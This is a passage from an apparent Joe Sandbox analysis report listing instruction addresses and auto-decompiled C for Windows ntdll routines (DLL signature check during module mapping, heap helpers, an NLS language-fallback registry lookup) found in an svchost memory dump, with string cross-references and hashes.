                        0x03092bb6
                        0x03092bb9
                        0x00000000
                        0x00000000
                        0x03092bbf
                        0x03092bc5
                        0x03092bc9
                        0x03092be8
                        0x03092bed
                        0x03092bcb
                        0x03092be0
                        0x03092be5
                        0x03092bf3
                        0x03092bf8
                        0x03092bfd
                        0x03092c05
                        0x03092c0e
                        0x03092c0e
                        0x00000000
                        0x0304b78e
                        0x0304b78e
                        0x0304b78e
                        0x0304b791
                        0x0304b791
                        0x0304b797
                        0x0304b797
                        0x0304b79f
                        0x0304b7a9
                        0x0304b7af
                        0x0304b7af
                        0x0304b7b1
                        0x0304b7b6
                        0x0304b7e2
                        0x0304b7e2
                        0x0304b7e7
                        0x0304b880
                        0x0304b7ed
                        0x0304b7ed
                        0x0304b7ed
                        0x0304b7ef
                        0x0304b7f2
                        0x0304b7f2
                        0x0304b7f5
                        0x0304b7fa
                        0x03092c2d
                        0x03092c2e
                        0x03092c39
                        0x0304b800
                        0x0304b800
                        0x0304b802
                        0x0304b805
                        0x0304b808
                        0x0304b808
                        0x0304b80a
                        0x0304b80d
                        0x0304b816
                        0x0304b81c
                        0x0304b822
                        0x0304b82f
                        0x0304b88b
                        0x0304b892
                        0x0304b897
                        0x0304b899
                        0x0304b89b
                        0x0304b89e
                        0x0304b8a5
                        0x0304b8a8
                        0x0304b8aa
                        0x0304b8ac
                        0x0304b8ac
                        0x0304b8aa
                        0x0304b892
                        0x0304b831
                        0x0304b839
                        0x0304b83b
                        0x0304b83b
                        0x0304b844
                        0x0304b84b
                        0x0304b852
                        0x0304b7b8
                        0x0304b7ba
                        0x0304b7bf
                        0x0304b7c4
                        0x03092c18
                        0x03092c19
                        0x03092c23
                        0x0304b7ca
                        0x0304b7ca
                        0x0304b7cc
                        0x0304b7cf
                        0x0304b7d1
                        0x0304b7d1
                        0x0304b7d4
                        0x0304b7dc
                        0x0304b8bb
                        0x0304b8bb
                        0x0304b8be
                        0x0304b8be
                        0x0304b8c1
                        0x00000000
                        0x00000000
                        0x0304b8c3
                        0x0304b8c5
                        0x0304b8c7
                        0x0304b8e0
                        0x00000000
                        0x0304b8e0
                        0x0304b8cc
                        0x0304b8cc
                        0x00000000
                        0x0304b8cc
                        0x0304b8d6
                        0x0304b8d6
                        0x00000000
                        0x0304b7dc
                        0x0304b7b6

                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                        • API String ID: 0-1334570610
                        • Opcode ID: 9cd576c04825cdcc96990bc2fb3b2a3a3641d97f39e7067f44d689427510b9c9
                        • Instruction ID: 5002d90f22410deb652aa8a58b8e96dcc73edbf17919048d5dddbd691431e271
                        • Opcode Fuzzy Hash: 9cd576c04825cdcc96990bc2fb3b2a3a3641d97f39e7067f44d689427510b9c9
                        • Instruction Fuzzy Hash: 3361A2B46012059FDB58DF28C544BAABBE5FF44304F18896EE8898F341D731E991CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 03037E41 Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                        Download Yara Rule
                        C-Code - Quality: 98%
                        			E03037E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0303CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0302C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x3115780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E030A5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x3115780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E03047D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E03047D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E030A7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E03047D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E03047D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E030A7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0305A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0302B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                        0x03037e4c
                        0x03037e50
                        0x03037e55
                        0x03037e58
                        0x03037e5d
                        0x03037e71
                        0x03037f33
                        0x03037e77
                        0x03037e77
                        0x03037e79
                        0x03037e79
                        0x03037e7e
                        0x03037f45
                        0x03089848
                        0x00000000
                        0x03089848
                        0x03037f4e
                        0x03037f53
                        0x03037f5a
                        0x00000000
                        0x00000000
                        0x0308985a
                        0x03089862
                        0x03089866
                        0x00000000
                        0x0308986c
                        0x00000000
                        0x0308986c
                        0x03037e84
                        0x03037e84
                        0x03037e8d
                        0x03089871
                        0x03037eb8
                        0x03037ec0
                        0x03037ec0
                        0x03037e9a
                        0x0308987e
                        0x00000000
                        0x00000000
                        0x03089884
                        0x0308988b
                        0x030898a7
                        0x030898ac
                        0x030898b1
                        0x030898b6
                        0x030898b8
                        0x030898b8
                        0x030898b9
                        0x00000000
                        0x030898b9
                        0x03037ea0
                        0x03037ea7
                        0x00000000
                        0x00000000
                        0x03037eac
                        0x03037eb1
                        0x03037ec6
                        0x03037ed0
                        0x030898cc
                        0x03037ed6
                        0x03037ed6
                        0x03037ed6
                        0x03037ede
                        0x03037ee3
                        0x030898e3
                        0x030898f0
                        0x03089902
                        0x030898f2
                        0x030898fb
                        0x030898fb
                        0x03089907
                        0x0308991d
                        0x0308991d
                        0x03089907
                        0x030898e3
                        0x03037ef0
                        0x03037f14
                        0x03037f14
                        0x03037f1e
                        0x03089946
                        0x03037f24
                        0x03037f24
                        0x03037f24
                        0x03037f2c
                        0x0308996a
                        0x03089975
                        0x03089975
                        0x0308997e
                        0x03089993
                        0x03089993
                        0x0308997e
                        0x00000000
                        0x03037ef2
                        0x03037efc
                        0x03037f0a
                        0x03037f0e
                        0x03089933
                        0x00000000
                        0x03089933
                        0x00000000
                        0x03037f0e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x03037eb1

                        Strings
                        • LdrpCompleteMapModule, xrefs: 03089898
                        • minkernel\ntdll\ldrmap.c, xrefs: 030898A2
                        • Could not validate the crypto signature for DLL %wZ, xrefs: 03089891
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                        • API String ID: 0-1676968949
                        • Opcode ID: e899b72eece286e2ba0214380ebf6fb98113d0b3e3d83b110606d0925875f51b
                        • Instruction ID: fd448647673b5a1b22f685097808b6a8222d333a5c198637858c5753725455d7
                        • Opcode Fuzzy Hash: e899b72eece286e2ba0214380ebf6fb98113d0b3e3d83b110606d0925875f51b
                        • Instruction Fuzzy Hash: 965125B5607741DFE721EB68C944B7ABBE8BB4AB10F080AA5E8919B7D1C730ED00C750
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0302E620 Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                        Download Yara Rule
                        C-Code - Quality: 93%
                        			E0302E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0302F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E030695D0();
						}
						if(_t78 != 0) {
							L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0306FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0306BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E03069600();
					if(_t97 < 0) {
						goto L6;
					}
					E0306BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0302F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0306BB40(_t83, _t102 + 0x24, _t78);
								if(L030343C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0306BB40(_t84, _t102 + 0x24, _t94);
									if(L030343C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                        0x0302e620
                        0x0302e628
                        0x0302e62f
                        0x0302e631
                        0x0302e635
                        0x0302e637
                        0x0302e63e
                        0x03085503
                        0x03085503
                        0x0302e64c
                        0x0302e64c
                        0x0302e651
                        0x00000000
                        0x00000000
                        0x0302e661
                        0x0302e665
                        0x0308542a
                        0x0302e715
                        0x0302e71a
                        0x0302e71c
                        0x0302e720
                        0x0302e720
                        0x0302e727
                        0x0302e736
                        0x0302e736
                        0x0302e743
                        0x0302e743
                        0x0302e673
                        0x0302e678
                        0x0302e67d
                        0x0302e682
                        0x0302e685
                        0x0302e692
                        0x0302e69b
                        0x0302e6a3
                        0x0302e6ad
                        0x0302e6b1
                        0x0302e6b2
                        0x0302e6bb
                        0x0302e6bf
                        0x0302e6c0
                        0x0302e6c8
                        0x0302e6cc
                        0x0302e6d5
                        0x0302e6d9
                        0x00000000
                        0x00000000
                        0x0302e6e5
                        0x0302e6ea
                        0x0302e6f9
                        0x0302e70b
                        0x0302e70f
                        0x03085439
                        0x0308545e
                        0x0308545e
                        0x00000000
                        0x0308545e
                        0x0308543b
                        0x0308543e
                        0x03085440
                        0x03085445
                        0x03085472
                        0x03085475
                        0x0308548d
                        0x03085493
                        0x030854a9
                        0x00000000
                        0x00000000
                        0x030854ab
                        0x030854b4
                        0x030854bc
                        0x030854c8
                        0x030854de
                        0x030854fb
                        0x030854e0
                        0x030854e6
                        0x030854eb
                        0x030854eb
                        0x030854de
                        0x00000000
                        0x030854bc
                        0x03085477
                        0x0308547a
                        0x03085480
                        0x03085483
                        0x03085486
                        0x0308548b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0308548b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x03085447
                        0x03085447
                        0x03085447
                        0x03085447
                        0x0308544e
                        0x00000000
                        0x00000000
                        0x03085450
                        0x03085452
                        0x03085455
                        0x0308545a
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0308545c
                        0x0308546a
                        0x0308546d
                        0x0308546f
                        0x00000000
                        0x0308546f
                        0x0302e70f

                        Strings
                        • @, xrefs: 0302E6C0
                        • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0302E68C
                        • InstallLanguageFallback, xrefs: 0302E6DB
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                        • API String ID: 0-1757540487
                        • Opcode ID: 707f933d1647ae0d6947dee6d1f8868ed867e3adf79d24c7c56c6c0590aeed67
                        • Instruction ID: 8e93733f97116a04f229f83488a99a81beb4b0b0fba39b0364565f4d4efbd1df
                        • Opcode Fuzzy Hash: 707f933d1647ae0d6947dee6d1f8868ed867e3adf79d24c7c56c6c0590aeed67
                        • Instruction Fuzzy Hash: 0C51E4B650A3159BC710EF25C840BABB3E8BF89714F09096EF989DB640F734D904C7A2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0304B8E4 Relevance: 3.8, Strings: 3, Instructions: 69COMMON
                        Download Yara Rule
                        C-Code - Quality: 60%
                        			E0304B8E4(unsigned int __edx) {
				void* __ecx;
				void* __edi;
				intOrPtr* _t16;
				intOrPtr _t18;
				void* _t27;
				void* _t28;
				unsigned int _t30;
				intOrPtr* _t31;
				unsigned int _t38;
				void* _t39;
				unsigned int _t40;

				_t40 = __edx;
				_t39 = _t28;
				if( *0x3118748 >= 1) {
					__eflags = (__edx + 0x00000fff & 0xfffff000) - __edx;
					if((__edx + 0x00000fff & 0xfffff000) != __edx) {
						_t18 =  *[fs:0x30];
						__eflags =  *(_t18 + 0xc);
						if( *(_t18 + 0xc) == 0) {
							_push("HEAP: ");
							E0302B150();
						} else {
							E0302B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)");
						E0302B150();
						__eflags =  *0x3117bc8;
						if(__eflags == 0) {
							E030E2073(_t27, 1, _t39, __eflags);
						}
					}
				}
				_t38 =  *(_t39 + 0xb8);
				if(_t38 != 0) {
					_t13 = _t40 >> 0xc;
					__eflags = _t13;
					while(1) {
						__eflags = _t13 -  *((intOrPtr*)(_t38 + 4));
						if(_t13 <  *((intOrPtr*)(_t38 + 4))) {
							break;
						}
						_t30 =  *_t38;
						__eflags = _t30;
						if(_t30 != 0) {
							_t38 = _t30;
							continue;
						}
						_t13 =  *((intOrPtr*)(_t38 + 4)) - 1;
						__eflags =  *((intOrPtr*)(_t38 + 4)) - 1;
						break;
					}
					return E0304AB40(_t39, _t38, 0, _t13, _t40);
				} else {
					_t31 = _t39 + 0x8c;
					_t16 =  *_t31;
					while(_t31 != _t16) {
						__eflags =  *((intOrPtr*)(_t16 + 0x14)) - _t40;
						if( *((intOrPtr*)(_t16 + 0x14)) >= _t40) {
							return _t16;
						}
						_t16 =  *_t16;
					}
					return _t31;
				}
			}














                        0x0304b8f0
                        0x0304b8f2
                        0x0304b8f4
                        0x03092c4e
                        0x03092c50
                        0x03092c56
                        0x03092c5c
                        0x03092c60
                        0x03092c7f
                        0x03092c84
                        0x03092c62
                        0x03092c77
                        0x03092c7c
                        0x03092c8a
                        0x03092c8f
                        0x03092c94
                        0x03092c9c
                        0x03092ca5
                        0x03092ca5
                        0x03092c9c
                        0x03092c50
                        0x0304b8fa
                        0x0304b902
                        0x0304b921
                        0x0304b921
                        0x0304b924
                        0x0304b924
                        0x0304b927
                        0x00000000
                        0x00000000
                        0x0304b929
                        0x0304b92b
                        0x0304b92d
                        0x0304b940
                        0x00000000
                        0x0304b940
                        0x0304b932
                        0x0304b932
                        0x00000000
                        0x0304b932
                        0x00000000
                        0x0304b904
                        0x0304b904
                        0x0304b90a
                        0x0304b90c
                        0x0304b916
                        0x0304b919
                        0x0304b915
                        0x0304b915
                        0x0304b91b
                        0x0304b91b
                        0x00000000
                        0x0304b910

                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                        • API String ID: 0-2558761708
                        • Opcode ID: c39588f52ce00e343fa88931c2b787a531bd8ceb577782817627f7236d050777
                        • Instruction ID: 3ad0d45fe3d35e33bc5cc8fdf790f75f35b85779789fd56b48e1e690b07123c7
                        • Opcode Fuzzy Hash: c39588f52ce00e343fa88931c2b787a531bd8ceb577782817627f7236d050777
                        • Instruction Fuzzy Hash: 5711E6B13072069FEB68EB18C484B7AB7A9EF80620F18857AE086CF341D730DE81D751
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030EE539 Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                        Download Yara Rule
                        C-Code - Quality: 60%
                        			E030EE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E030EBBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E030EBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E030EAFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E03069730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E030EA80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E030EA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E03069730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E030EA80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E030EA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E03042280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E0303B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E0303FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E03047D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E030DFEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}




































                        0x030ee547
                        0x030ee549
                        0x030ee54f
                        0x030ee553
                        0x030ee557
                        0x030ee55a
                        0x030ee55c
                        0x030ee55f
                        0x030ee561
                        0x030ee567
                        0x030ee56b
                        0x030ee7e2
                        0x00000000
                        0x030ee571
                        0x030ee575
                        0x030ee577
                        0x030ee57b
                        0x030ee57c
                        0x030ee57d
                        0x030ee57e
                        0x030ee57f
                        0x030ee588
                        0x030ee58f
                        0x030ee591
                        0x030ee592
                        0x030ee592
                        0x030ee596
                        0x030ee59e
                        0x030ee5a0
                        0x030ee5a6
                        0x030ee61d
                        0x030ee61d
                        0x030ee621
                        0x030ee623
                        0x030ee630
                        0x030ee630
                        0x030ee7e6
                        0x030ee7eb
                        0x030ee7ed
                        0x030ee7f4
                        0x030ee7fa
                        0x030ee7ff
                        0x030ee7ff
                        0x030ee80a
                        0x030ee812
                        0x030ee812
                        0x030ee5ab
                        0x030ee5b4
                        0x030ee5b9
                        0x030ee5be
                        0x030ee5c0
                        0x030ee5c2
                        0x030ee5c8
                        0x030ee5c9
                        0x030ee5cb
                        0x030ee5cc
                        0x030ee5d5
                        0x030ee5e4
                        0x030ee5f1
                        0x030ee5f8
                        0x030ee5f8
                        0x030ee5d5
                        0x030ee602
                        0x030ee616
                        0x030ee63d
                        0x030ee644
                        0x030ee64d
                        0x030ee652
                        0x030ee657
                        0x030ee659
                        0x030ee65b
                        0x030ee661
                        0x030ee662
                        0x030ee664
                        0x030ee665
                        0x030ee66e
                        0x030ee67d
                        0x030ee68a
                        0x030ee691
                        0x030ee691
                        0x030ee66e
                        0x030ee6b0
                        0x00000000
                        0x030ee6b6
                        0x030ee6bd
                        0x030ee6c7
                        0x030ee6d7
                        0x030ee6d9
                        0x030ee6db
                        0x030ee6de
                        0x030ee6e3
                        0x030ee6f3
                        0x030ee6fc
                        0x030ee700
                        0x030ee700
                        0x030ee704
                        0x030ee70a
                        0x030ee70a
                        0x030ee713
                        0x030ee716
                        0x030ee719
                        0x030ee720
                        0x030ee761
                        0x030ee76b
                        0x030ee774
                        0x030ee77a
                        0x030ee77a
                        0x030ee78a
                        0x030ee791
                        0x030ee799
                        0x030ee79b
                        0x030ee79f
                        0x030ee7aa
                        0x030ee7c0
                        0x030ee7ac
                        0x030ee7b2
                        0x030ee7b9
                        0x030ee7b9
                        0x030ee7c7
                        0x030ee806
                        0x00000000
                        0x030ee7c9
                        0x030ee7d1
                        0x030ee7d8
                        0x00000000
                        0x030ee7d8
                        0x00000000
                        0x00000000
                        0x030ee722
                        0x030ee72e
                        0x030ee748
                        0x030ee74c
                        0x030ee754
                        0x030ee756
                        0x030ee75c
                        0x030ee75c
                        0x00000000
                        0x030ee75c
                        0x030ee758
                        0x030ee758
                        0x00000000
                        0x030ee758
                        0x030ee750
                        0x00000000
                        0x00000000
                        0x030ee752
                        0x00000000
                        0x030ee752
                        0x030ee730
                        0x030ee735
                        0x030ee73d
                        0x030ee73f
